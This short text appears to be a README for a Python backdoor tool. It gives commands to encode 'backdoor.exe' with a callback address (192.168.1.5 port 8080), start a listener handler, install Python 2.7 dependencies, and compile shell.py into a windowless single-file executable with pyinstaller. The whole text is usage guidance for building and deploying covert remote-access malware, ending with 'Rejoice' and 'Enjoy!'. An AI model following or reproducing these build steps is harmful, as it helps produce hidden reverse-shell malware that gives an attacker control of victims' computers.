python2 encode.py 192.168.1.5 8080 backdoor.exe
python2 handler.py
Rejoice
- Install Python2.7
- Install Microsoft Visual C++ 9.0
- pip install -r requirements.txt
pypiwin32is a Windows-only dep, so it was omitted from requirements.txt. If you are on windows and are using a section of the code that requires it, pleasepip install -U pypiwin32yourself.
pyinstaller --noconsole --onefile shell.py
Your file will be in dist/shell.exe
Enjoy!
